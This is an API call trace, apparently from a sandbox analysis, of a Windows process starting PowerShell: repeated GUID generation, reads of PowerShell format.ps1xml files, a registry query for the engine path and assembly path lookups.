	[0601.693] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x444d9587, Data2=0xc2db, Data3=0x4c94, Data4=([0]=0x9a, [1]=0xb3, [2]=0xe7, [3]=0xb5, [4]=0xae, [5]=0x87, [6]=0x18, [7]=0xf1))) returned 0x0
	[0601.693] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x84b40756, Data2=0x116e, Data3=0x4b5b, Data4=([0]=0x9c, [1]=0xd9, [2]=0x97, [3]=0x64, [4]=0xb3, [5]=0xf7, [6]=0xfc, [7]=0x38))) returned 0x0
	[0601.693] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x575dc4d5, Data2=0x9d74, Data3=0x4e4a, Data4=([0]=0xae, [1]=0x75, [2]=0xd0, [3]=0x0, [4]=0x2, [5]=0x32, [6]=0xbb, [7]=0xfd))) returned 0x0
	[0601.693] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xb7608386, Data2=0x179b, Data3=0x4d4e, Data4=([0]=0xa6, [1]=0x51, [2]=0xb0, [3]=0x6e, [4]=0x1c, [5]=0x1b, [6]=0xaa, [7]=0x64))) returned 0x0
	[0601.693] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x23ec705a, Data2=0xa324, Data3=0x4e98, Data4=([0]=0xab, [1]=0xbb, [2]=0x4, [3]=0x94, [4]=0x78, [5]=0xc4, [6]=0x7d, [7]=0xb2))) returned 0x0
	[0601.694] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xe0215a3f, Data2=0x8d85, Data3=0x4215, Data4=([0]=0xb4, [1]=0xd6, [2]=0x43, [3]=0x71, [4]=0x40, [5]=0x5b, [6]=0x40, [7]=0xea))) returned 0x0
	[0601.694] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x9a3bf445, Data2=0xc83e, Data3=0x4454, Data4=([0]=0xa6, [1]=0xfe, [2]=0xfc, [3]=0xd4, [4]=0x86, [5]=0x43, [6]=0xec, [7]=0x99))) returned 0x0
	[0601.694] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x26cb2476, Data2=0x70e8, Data3=0x42b2, Data4=([0]=0x90, [1]=0x2e, [2]=0x33, [3]=0x37, [4]=0xd, [5]=0xfc, [6]=0xfe, [7]=0x5d))) returned 0x0
	[0601.694] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x6cc2daee, Data2=0x71a6, Data3=0x4cbe, Data4=([0]=0x82, [1]=0xe7, [2]=0x54, [3]=0x71, [4]=0xbb, [5]=0xb4, [6]=0xbd, [7]=0x83))) returned 0x0
	[0601.694] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x29cd2526, Data2=0x5c13, Data3=0x476d, Data4=([0]=0x9a, [1]=0x3b, [2]=0x84, [3]=0x29, [4]=0xd5, [5]=0x6d, [6]=0xe2, [7]=0x5a))) returned 0x0
	[0601.694] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xa03c3eee, Data2=0x2f0b, Data3=0x429a, Data4=([0]=0xbe, [1]=0xd2, [2]=0x50, [3]=0xe9, [4]=0x9a, [5]=0x38, [6]=0x46, [7]=0xce))) returned 0x0
	[0601.694] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xbe62894a, Data2=0xb790, Data3=0x48a9, Data4=([0]=0x9f, [1]=0x30, [2]=0x80, [3]=0x1c, [4]=0x18, [5]=0x3e, [6]=0xc4, [7]=0x52))) returned 0x0
	[0601.694] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x8204c28e, Data2=0x228b, Data3=0x459c, Data4=([0]=0x9b, [1]=0xaa, [2]=0x66, [3]=0x12, [4]=0x31, [5]=0xbe, [6]=0xf2, [7]=0xef))) returned 0x0
	[0601.695] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x8912d6f7, Data2=0x423c, Data3=0x42e0, Data4=([0]=0x82, [1]=0xe3, [2]=0x4, [3]=0x51, [4]=0xc5, [5]=0xc4, [6]=0x7e, [7]=0x5d))) returned 0x0
	[0601.695] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xf7c852eb, Data2=0xfbe7, Data3=0x4f72, Data4=([0]=0xaa, [1]=0xcd, [2]=0x24, [3]=0xad, [4]=0xb2, [5]=0x7f, [6]=0xc1, [7]=0x92))) returned 0x0
	[0601.695] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xbbcf9cdd, Data2=0x4059, Data3=0x4d67, Data4=([0]=0x82, [1]=0x88, [2]=0xf, [3]=0x8e, [4]=0x1d, [5]=0x2, [6]=0x72, [7]=0x4f))) returned 0x0
	[0601.695] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x5f395403, Data2=0xdcda, Data3=0x4824, Data4=([0]=0xb8, [1]=0x80, [2]=0xa7, [3]=0x45, [4]=0x39, [5]=0x46, [6]=0xbf, [7]=0x78))) returned 0x0
	[0601.695] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xfe81347, Data2=0x1b8d, Data3=0x463f, Data4=([0]=0x9f, [1]=0xb8, [2]=0x29, [3]=0x99, [4]=0x9c, [5]=0x71, [6]=0xa9, [7]=0x8a))) returned 0x0
	[0601.695] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x8597e62a, Data2=0x8731, Data3=0x40dd, Data4=([0]=0x8f, [1]=0x6e, [2]=0xa1, [3]=0xfa, [4]=0x77, [5]=0xad, [6]=0xe0, [7]=0x31))) returned 0x0
	[0601.696] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xcd255679, Data2=0x1388, Data3=0x4b3f, Data4=([0]=0x92, [1]=0xd4, [2]=0x9b, [3]=0xed, [4]=0xa, [5]=0x9b, [6]=0x42, [7]=0x64))) returned 0x0
	[0601.696] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x7f4ebcf4, Data2=0xecf6, Data3=0x4a4e, Data4=([0]=0xab, [1]=0xbb, [2]=0xc6, [3]=0x74, [4]=0xb9, [5]=0x58, [6]=0x5c, [7]=0xfe))) returned 0x0
	[0601.696] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x719b632d, Data2=0x8d56, Data3=0x4111, Data4=([0]=0x94, [1]=0x78, [2]=0x85, [3]=0xab, [4]=0x4d, [5]=0x45, [6]=0x9, [7]=0x77))) returned 0x0
	[0601.696] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xeef65d6c, Data2=0x77a9, Data3=0x45de, Data4=([0]=0x83, [1]=0xa7, [2]=0x10, [3]=0xee, [4]=0x17, [5]=0x98, [6]=0x30, [7]=0x8c))) returned 0x0
	[0601.696] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xb755e8df, Data2=0x8b06, Data3=0x474f, Data4=([0]=0xb7, [1]=0x98, [2]=0x25, [3]=0x54, [4]=0x27, [5]=0x90, [6]=0x48, [7]=0x53))) returned 0x0
	[0601.696] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x784742a3, Data2=0x93c2, Data3=0x40be, Data4=([0]=0x82, [1]=0x0, [2]=0xa5, [3]=0x3b, [4]=0x57, [5]=0xa3, [6]=0x40, [7]=0x63))) returned 0x0
	[0601.696] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x52471040, Data2=0xcdcd, Data3=0x401e, Data4=([0]=0xb1, [1]=0xef, [2]=0x2d, [3]=0x60, [4]=0xbf, [5]=0x9d, [6]=0x9c, [7]=0xa0))) returned 0x0
	[0601.696] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xeb3ad7a6, Data2=0x49f5, Data3=0x43e1, Data4=([0]=0xa8, [1]=0xd2, [2]=0x81, [3]=0x7f, [4]=0x7e, [5]=0xca, [6]=0x91, [7]=0x75))) returned 0x0
	[0601.696] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x81824295, Data2=0xb7fe, Data3=0x4a7c, Data4=([0]=0xbc, [1]=0x15, [2]=0xf6, [3]=0x5d, [4]=0x7b, [5]=0x38, [6]=0xa1, [7]=0x2d))) returned 0x0
	[0601.697] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xc14987f8, Data2=0x6a86, Data3=0x4b7b, Data4=([0]=0xb9, [1]=0xc7, [2]=0xbd, [3]=0x53, [4]=0x84, [5]=0xeb, [6]=0xf4, [7]=0x8a))) returned 0x0
	[0601.697] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xae75285a, Data2=0xa538, Data3=0x4df9, Data4=([0]=0x87, [1]=0xbd, [2]=0xcb, [3]=0xba, [4]=0xc9, [5]=0x42, [6]=0xc7, [7]=0x84))) returned 0x0
	[0601.697] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x3034e539, Data2=0xeef, Data3=0x4466, Data4=([0]=0x93, [1]=0x0, [2]=0xb6, [3]=0xda, [4]=0x1b, [5]=0x2f, [6]=0xb6, [7]=0x2a))) returned 0x0
	[0601.698] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x3a8a452f, Data2=0x4152, Data3=0x4003, Data4=([0]=0x95, [1]=0x5a, [2]=0x90, [3]=0xbd, [4]=0xb6, [5]=0x7f, [6]=0xce, [7]=0x81))) returned 0x0
	[0601.698] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xd283931f, Data2=0xc3fe, Data3=0x4a68, Data4=([0]=0xb8, [1]=0xf1, [2]=0x51, [3]=0xbf, [4]=0x19, [5]=0x89, [6]=0xa8, [7]=0xc5))) returned 0x0
	[0601.698] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x37d8fd86, Data2=0x1a93, Data3=0x4096, Data4=([0]=0x8c, [1]=0xa, [2]=0x2d, [3]=0xf4, [4]=0x1b, [5]=0x71, [6]=0x3f, [7]=0xe1))) returned 0x0
	[0601.699] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x8bdb3b97, Data2=0x12b4, Data3=0x4359, Data4=([0]=0xa8, [1]=0x1d, [2]=0xa0, [3]=0x4d, [4]=0xd, [5]=0xb4, [6]=0xb8, [7]=0x8a))) returned 0x0
	[0601.699] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xdcebdc97, Data2=0x3f45, Data3=0x402d, Data4=([0]=0xa5, [1]=0x45, [2]=0x34, [3]=0x87, [4]=0x5c, [5]=0x66, [6]=0x1f, [7]=0xb4))) returned 0x0
	[0601.699] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x506753f4, Data2=0x9890, Data3=0x4c0c, Data4=([0]=0xb5, [1]=0x5c, [2]=0x59, [3]=0xc9, [4]=0xe4, [5]=0xfb, [6]=0xda, [7]=0x1a))) returned 0x0
	[0601.699] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x491cb3ae, Data2=0x9872, Data3=0x4e34, Data4=([0]=0x99, [1]=0x58, [2]=0x45, [3]=0xb5, [4]=0xc2, [5]=0x21, [6]=0x5f, [7]=0xdf))) returned 0x0
	[0601.699] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xd8f0cc7a, Data2=0xbbfc, Data3=0x42fc, Data4=([0]=0xb7, [1]=0xa4, [2]=0x92, [3]=0x33, [4]=0x63, [5]=0x98, [6]=0x5, [7]=0x87))) returned 0x0
	[0601.699] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xbe790929, Data2=0x8ff6, Data3=0x48fd, Data4=([0]=0xb0, [1]=0x58, [2]=0x8a, [3]=0xb4, [4]=0x73, [5]=0xc4, [6]=0xb7, [7]=0xe0))) returned 0x0
	[0601.700] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xd0d2dd81, Data2=0xc442, Data3=0x409e, Data4=([0]=0xae, [1]=0x78, [2]=0x60, [3]=0xe2, [4]=0xb4, [5]=0xa, [6]=0x9e, [7]=0xf8))) returned 0x0
	[0601.700] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x3f24f108, Data2=0x8974, Data3=0x477f, Data4=([0]=0xa0, [1]=0x70, [2]=0xd7, [3]=0x40, [4]=0xfb, [5]=0x83, [6]=0x1f, [7]=0x54))) returned 0x0
	[0601.700] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xadef4139, Data2=0x1bb9, Data3=0x41e9, Data4=([0]=0xa1, [1]=0xdf, [2]=0xc5, [3]=0xe8, [4]=0xe7, [5]=0x65, [6]=0x86, [7]=0xa6))) returned 0x0
	[0601.700] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x53ee1f03, Data2=0x635c, Data3=0x48d5, Data4=([0]=0x92, [1]=0xb, [2]=0xb8, [3]=0x6a, [4]=0x19, [5]=0x8d, [6]=0xb6, [7]=0xf7))) returned 0x0
	[0601.700] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x62e5aefb, Data2=0x7f2a, Data3=0x4a72, Data4=([0]=0xb4, [1]=0xd4, [2]=0x92, [3]=0x7a, [4]=0xcc, [5]=0x26, [6]=0x94, [7]=0x70))) returned 0x0
	[0601.700] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x29d0b9ec, Data2=0xacd1, Data3=0x4e81, Data4=([0]=0xab, [1]=0x1c, [2]=0x8f, [3]=0x4, [4]=0x45, [5]=0xc0, [6]=0x35, [7]=0xa8))) returned 0x0
	[0601.701] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0601.701] GetFileType (hFile=0x324) returned 0x1
	[0601.701] SetErrorMode (uMode=0x1) returned 0x1
	[0601.701] GetFileType (hFile=0x324) returned 0x1
	[0601.701] ReadFile (in: hFile=0x324, lpBuffer=0x2fc06a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2fc06a0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0603.038] ReadFile (in: hFile=0x324, lpBuffer=0x2fc06a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2fc06a0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0603.038] ReadFile (in: hFile=0x324, lpBuffer=0x2fc06a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2fc06a0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0603.038] ReadFile (in: hFile=0x324, lpBuffer=0x2fc06a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2fc06a0*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0603.038] ReadFile (in: hFile=0x324, lpBuffer=0x2fc06a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2fc06a0*, lpNumberOfBytesRead=0x1ed078*=0x8b4, lpOverlapped=0x0) returned 1
	[0603.039] ReadFile (in: hFile=0x324, lpBuffer=0x2fbfabc, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2fbfabc*, lpNumberOfBytesRead=0x1ed078*=0x0, lpOverlapped=0x0) returned 1
	[0603.039] ReadFile (in: hFile=0x324, lpBuffer=0x2fc06a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2fc06a0*, lpNumberOfBytesRead=0x1ed078*=0x0, lpOverlapped=0x0) returned 1
	[0603.039] CloseHandle (hObject=0x324) returned 1
	[0603.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0603.039] SetErrorMode (uMode=0x1) returned 0x1
	[0603.039] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed020 | out: lpFileInformation=0x1ed020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0603.039] SetErrorMode (uMode=0x1) returned 0x1
	[0603.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0603.040] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed108 | out: phkResult=0x1ed108*=0x324) returned 0x0
	[0603.040] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed08c, lpData=0x0, lpcbData=0x1ed088*=0x0 | out: lpType=0x1ed08c*=0x1, lpData=0x0, lpcbData=0x1ed088*=0x56) returned 0x0
	[0603.040] CoTaskMemAlloc (cb=0x5a) returned 0x1b9a14a0
	[0603.040] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed05c, lpData=0x1b9a14a0, lpcbData=0x1ed058*=0x56 | out: lpType=0x1ed05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed058*=0x56) returned 0x0
	[0603.040] CoTaskMemFree (pv=0x1b9a14a0) 
	[0603.040] RegCloseKey (hKey=0x324) returned 0x0
	[0603.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0603.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0603.041] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x687775d5, Data2=0xa66, Data3=0x40c4, Data4=([0]=0x8d, [1]=0xdb, [2]=0x71, [3]=0x93, [4]=0x8b, [5]=0x52, [6]=0xa7, [7]=0xd4))) returned 0x0
	[0603.041] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x9bc87d51, Data2=0xd454, Data3=0x4b16, Data4=([0]=0xa2, [1]=0xb9, [2]=0x5e, [3]=0xc5, [4]=0x58, [5]=0xea, [6]=0xb1, [7]=0x52))) returned 0x0
	[0603.042] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0603.042] GetFileType (hFile=0x324) returned 0x1
	[0603.042] SetErrorMode (uMode=0x1) returned 0x1
	[0603.042] GetFileType (hFile=0x324) returned 0x1
	[0603.042] ReadFile (in: hFile=0x324, lpBuffer=0x2ffe488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ffe488*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0603.045] ReadFile (in: hFile=0x324, lpBuffer=0x2ffe488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ffe488*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0603.045] ReadFile (in: hFile=0x324, lpBuffer=0x2ffe488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ffe488*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0603.045] ReadFile (in: hFile=0x324, lpBuffer=0x2ffe488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ffe488*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0603.045] ReadFile (in: hFile=0x324, lpBuffer=0x2ffe488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ffe488*, lpNumberOfBytesRead=0x1ed078*=0xe98, lpOverlapped=0x0) returned 1
	[0603.046] ReadFile (in: hFile=0x324, lpBuffer=0x2ffda88, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ffda88*, lpNumberOfBytesRead=0x1ed078*=0x0, lpOverlapped=0x0) returned 1
	[0603.046] ReadFile (in: hFile=0x324, lpBuffer=0x2ffe488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2ffe488*, lpNumberOfBytesRead=0x1ed078*=0x0, lpOverlapped=0x0) returned 1
	[0603.046] CloseHandle (hObject=0x324) returned 1
	[0603.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0603.046] SetErrorMode (uMode=0x1) returned 0x1
	[0603.046] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed020 | out: lpFileInformation=0x1ed020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0603.046] SetErrorMode (uMode=0x1) returned 0x1
	[0603.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0603.047] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed108 | out: phkResult=0x1ed108*=0x324) returned 0x0
	[0603.047] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed08c, lpData=0x0, lpcbData=0x1ed088*=0x0 | out: lpType=0x1ed08c*=0x1, lpData=0x0, lpcbData=0x1ed088*=0x56) returned 0x0
	[0603.047] CoTaskMemAlloc (cb=0x5a) returned 0x1b9a14a0
	[0603.047] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed05c, lpData=0x1b9a14a0, lpcbData=0x1ed058*=0x56 | out: lpType=0x1ed05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed058*=0x56) returned 0x0
	[0603.047] CoTaskMemFree (pv=0x1b9a14a0) 
	[0603.047] RegCloseKey (hKey=0x324) returned 0x0
	[0603.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0603.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0603.048] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x3719cf9f, Data2=0x3c7e, Data3=0x46ea, Data4=([0]=0x9d, [1]=0x27, [2]=0x8, [3]=0xf5, [4]=0x8a, [5]=0x35, [6]=0x5d, [7]=0x12))) returned 0x0
	[0603.048] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xba040373, Data2=0xdde4, Data3=0x40fe, Data4=([0]=0x9e, [1]=0x58, [2]=0x88, [3]=0x3a, [4]=0x73, [5]=0xa, [6]=0xa1, [7]=0xdf))) returned 0x0
	[0603.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ed0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0603.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ed0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0603.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ed0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0603.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ed0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
